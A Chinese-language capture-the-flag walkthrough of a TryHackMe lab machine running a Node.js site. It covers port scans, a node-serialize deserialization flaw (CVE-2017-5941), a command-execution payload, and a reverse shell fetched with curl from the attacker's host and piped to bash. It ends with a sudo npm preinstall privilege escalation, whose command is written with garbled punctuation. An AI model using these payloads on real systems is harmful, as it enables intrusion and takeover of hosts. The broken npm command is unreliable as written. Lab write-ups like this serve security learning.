打靶记录(一零四)之THMJaxSucksAlot

端口扫描

nmap --min-rate=10000 -p- 10.10.111.140
Starting Nmap 7.93 ( https://nmap.org ) at 2024-03-14 13:38 UTC
Nmap scan report for ip-10-10-111-140.eu-west-1.compute.internal (10.10.111.140)
Host is up (0.0068s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
MAC Address: 02:BB:33:C4:53:AB (Unknown)

Nmap done: 1 IP address (1 host up) scanned in 3.82 seconds

nmap -sV -sT -sC -O -p22,80 10.10.111.140
Starting Nmap 7.93 ( https://nmap.org ) at 2024-03-14 13:38 UTC
Nmap scan report for ip-10-10-111-140.eu-west-1.compute.internal (10.10.111.140)
Host is up (0.00042s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 5b2d9d60a745de7a99203e4294ce193c (RSA)
|   256 bf32780183af785ee7fe9c834a7daa6b (ECDSA)
|_  256 12ab1380e5ad7307c848d5ca7c7de0af (ED25519)
80/tcp open  http
|_http-title: Horror LLC
| fingerprint-strings: 
|   GetRequest, HTTPOptions: 
|     HTTP/1.1 200 OK
|     Content-Type: text/html
|     Date: Thu, 14 Mar 2024 13:39:07 GMT
|     Connection: close
|     <html><head>
|     <title>Horror LLC</title>
|     <style>
|     body {
|     background: linear-gradient(253deg, #4a040d, #3b0b54, #3a343b);
|     background-size: 300% 300%;
|     -webkit-animation: Background 10s ease infinite;
|     -moz-animation: Background 10s ease infinite;
|     animation: Background 10s ease infinite;
|     @-webkit-keyframes Background {
|     background-position: 0% 50%
|     background-position: 100% 50%
|     100% {
|     background-position: 0% 50%
|     @-moz-keyframes Background {
|     background-position: 0% 50%
|     background-position: 100% 50%
|     100% {
|     background-position: 0% 50%
|     @keyframes Background {
|     background-position: 0% 50%
|_    background-posi
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port80-TCP:V=7.93%I=7%D=3/14%Time=65F2FDFC%P=x86_64-pc-linux-gnu%r(GetR
SF:equest,E4B,"HTTP/1\.1\x20200\x20OK\r\nContent-Type:\x20text/html\r\nDat
SF:e:\x20Thu,\x2014\x20Mar\x202024\x2013:39:07\x20GMT\r\nConnection:\x20cl
SF:ose\r\n\r\n<html><head>\n<title>Horror\x20LLC</title>\n<style>\n\x20\x2
SF:0body\x20{\n\x20\x20\x20\x20background:\x20linear-gradient\(253deg,\x20
SF:#4a040d,\x20#3b0b54,\x20#3a343b\);\n\x20\x20\x20\x20background-size:\x2
SF:0300%\x20300%;\n\x20\x20\x20\x20-webkit-animation:\x20Background\x2010s
SF:\x20ease\x20infinite;\n\x20\x20\x20\x20-moz-animation:\x20Background\x2
SF:010s\x20ease\x20infinite;\n\x20\x20\x20\x20animation:\x20Background\x20
SF:10s\x20ease\x20infinite;\n\x20\x20}\n\x20\x20\n\x20\x20@-webkit-keyfram
SF:es\x20Background\x20{\n\x20\x20\x20\x200%\x20{\n\x20\x20\x20\x20\x20\x2
SF:0background-position:\x200%\x2050%\n\x20\x20\x20\x20}\n\x20\x20\x20\x20
SF:50%\x20{\n\x20\x20\x20\x20\x20\x20background-position:\x20100%\x2050%\n
SF:\x20\x20\x20\x20}\n\x20\x20\x20\x20100%\x20{\n\x20\x20\x20\x20\x20\x20b
SF:ackground-position:\x200%\x2050%\n\x20\x20\x20\x20}\n\x20\x20}\n\x20\x2
SF:0\n\x20\x20@-moz-keyframes\x20Background\x20{\n\x20\x20\x20\x200%\x20{\
SF:n\x20\x20\x20\x20\x20\x20background-position:\x200%\x2050%\n\x20\x20\x2
SF:0\x20}\n\x20\x20\x20\x2050%\x20{\n\x20\x20\x20\x20\x20\x20background-po
SF:sition:\x20100%\x2050%\n\x20\x20\x20\x20}\n\x20\x20\x20\x20100%\x20{\n\
SF:x20\x20\x20\x20\x20\x20background-position:\x200%\x2050%\n\x20\x20\x20\
SF:x20}\n\x20\x20}\n\x20\x20\n\x20\x20@keyframes\x20Background\x20{\n\x20\
SF:x20\x20\x200%\x20{\n\x20\x20\x20\x20\x20\x20background-position:\x200%\
SF:x2050%\n\x20\x20\x20\x20}\n\x20\x20\x20\x2050%\x20{\n\x20\x20\x20\x20\x
SF:20\x20background-posi")%r(HTTPOptions,E4B,"HTTP/1\.1\x20200\x20OK\r\nCo
SF:ntent-Type:\x20text/html\r\nDate:\x20Thu,\x2014\x20Mar\x202024\x2013:39
SF::07\x20GMT\r\nConnection:\x20close\r\n\r\n<html><head>\n<title>Horror\x
SF:20LLC</title>\n<style>\n\x20\x20body\x20{\n\x20\x20\x20\x20background:\
SF:x20linear-gradient\(253deg,\x20#4a040d,\x20#3b0b54,\x20#3a343b\);\n\x20
SF:\x20\x20\x20background-size:\x20300%\x20300%;\n\x20\x20\x20\x20-webkit-
SF:animation:\x20Background\x2010s\x20ease\x20infinite;\n\x20\x20\x20\x20-
SF:moz-animation:\x20Background\x2010s\x20ease\x20infinite;\n\x20\x20\x20\
SF:x20animation:\x20Background\x2010s\x20ease\x20infinite;\n\x20\x20}\n\x2
SF:0\x20\n\x20\x20@-webkit-keyframes\x20Background\x20{\n\x20\x20\x20\x200
SF:%\x20{\n\x20\x20\x20\x20\x20\x20background-position:\x200%\x2050%\n\x20
SF:\x20\x20\x20}\n\x20\x20\x20\x2050%\x20{\n\x20\x20\x20\x20\x20\x20backgr
SF:ound-position:\x20100%\x2050%\n\x20\x20\x20\x20}\n\x20\x20\x20\x20100%\
SF:x20{\n\x20\x20\x20\x20\x20\x20background-position:\x200%\x2050%\n\x20\x
SF:20\x20\x20}\n\x20\x20}\n\x20\x20\n\x20\x20@-moz-keyframes\x20Background
SF:\x20{\n\x20\x20\x20\x200%\x20{\n\x20\x20\x20\x20\x20\x20background-posi
SF:tion:\x200%\x2050%\n\x20\x20\x20\x20}\n\x20\x20\x20\x2050%\x20{\n\x20\x
SF:20\x20\x20\x20\x20background-position:\x20100%\x2050%\n\x20\x20\x20\x20
SF:}\n\x20\x20\x20\x20100%\x20{\n\x20\x20\x20\x20\x20\x20background-positi
SF:on:\x200%\x2050%\n\x20\x20\x20\x20}\n\x20\x20}\n\x20\x20\n\x20\x20@keyf
SF:rames\x20Background\x20{\n\x20\x20\x20\x200%\x20{\n\x20\x20\x20\x20\x20
SF:\x20background-position:\x200%\x2050%\n\x20\x20\x20\x20}\n\x20\x20\x20\
SF:x2050%\x20{\n\x20\x20\x20\x20\x20\x20background-posi");
MAC Address: 02:BB:33:C4:53:AB (Unknown)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (94%), Linux 3.10 - 3.13 (94%), Linux 3.8 (94%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%), Linux 2.6.32 (92%), Linux 2.6.39 - 3.2 (92%), Linux 3.1 - 3.2 (92%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 19.22 seconds

Web

根据提示是Nodejs搭建的网站，扫描了目录什么都没有，有一个JS脚本

document.getElementById("signup").addEventListener("click", function() {
var date = new Date();
   	date.setTime(date.getTime()+(-1*24*60*60*1000));
   	var expires = "; expires="+date.toGMTString();
   	document.cookie = "session=foobar"+expires+"; path=/";
   	const Http = new XMLHttpRequest();
       console.log(location);
       const url=window.location.href+"?email="+document.getElementById("fname").value;
       Http.open("POST", url);
       Http.send();
setTimeout(function() {
	window.location.reload();
}, 500);
   }); 

将我们POST表单上传的东西拼接成一个URL然后POST请求，像是:

http://ip?email=输入的东西

除此之外还设置了一个cookie

curl -I -X POST 'http://10.10.111.140?email=' -v
*   Trying 10.10.111.140:80...
* Connected to 10.10.111.140 (10.10.111.140) port 80
> POST /?email= HTTP/1.1
> Host: 10.10.111.140
> User-Agent: curl/8.5.0
> Accept: */*
> 
< HTTP/1.1 200 OK
HTTP/1.1 200 OK
< Set-Cookie: session=eyJlbWFpbCI6IiJ9; Max-Age=900000; HttpOnly, Secure
Set-Cookie: session=eyJlbWFpbCI6IiJ9; Max-Age=900000; HttpOnly, Secure
< Content-Type: text/html
Content-Type: text/html
< Date: Thu, 14 Mar 2024 15:35:54 GMT
Date: Thu, 14 Mar 2024 15:35:54 GMT
< Connection: keep-alive
Connection: keep-alive
< Transfer-Encoding: chunked
Transfer-Encoding: chunked

< 
* Excess found: excess = 1071 url = / (zero-length body)
* Connection #0 to host 10.10.111.140 left intact

得到cookie，base64解码之后:{“email”:””}

也就是我们输入的东西。

房间提示反序列化，结合nodejs,可以得到是CVE-2017-5941

漏洞报告指出一个名为 node-serialize 的序列/反序列化模块，来自网络请求的 cookie 会传递到该模块的 unserialize() 函数中，然后结合立即调用函数表达式（英文：immediately-invoked function expression，缩写：IIFE），就能达到RCE的目的，所以我们输入的email值会被base64编码然后设置成为cookie并且访问页面的时候被反序列化

构造payload,向我们的主机发起ping请求

_$$ND_FUNC$$_function (){\n \t require('child_process').exec('ping -c 1 10.11.77.28',function(error,stdout,stderr){console.log(stdout)});\n}()

kali开启:

└─$ sudo tcpdump -i tun0 icmp 

输入框中输入后，我们收到了icmp包，说明能够命令执行，执行一个反弹shell

在kali开启一个web服务器，写上一个shell.sh

#!/bin/bash
/bin/sh -i >& /dev/tcp/10.11.77.28/1234 0>&1

_$$ND_FUNC$$_function (){\n \t require('child_process').exec('curl http://10.11.77.28/shell.sh |bash',function(error,stdout,stderr){console.log(stdout)});\n}()

开启监听，我们得到了shell

提权

sudo -l发现能执行npm,总之就是自己构造一个依赖然后来安装它

TF=$（mktemp -d）
echo '{“scripts”：{“preinstall”：“/bin/sh”}}'$TF/package.json
sudo npm -C $TF --unsafe perm i

碎碎念

虽然是简单难度的靶机，但是nodejs反序列化还是第一次接触，真的是研究了很久，还是挺难的哎